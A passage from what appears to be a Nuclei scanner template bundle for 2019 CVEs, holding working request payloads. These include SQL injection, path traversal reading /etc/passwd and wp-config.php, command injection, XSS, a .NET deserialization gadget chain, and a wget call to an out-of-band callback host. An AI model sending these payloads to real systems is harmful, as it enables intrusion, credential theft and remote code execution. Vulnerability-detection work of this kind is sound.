Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["com.atlassian.jira"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : "]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb \\\">')"],"condition":"and"}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/userpro/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":[""]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Citrix SD-WAN\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: 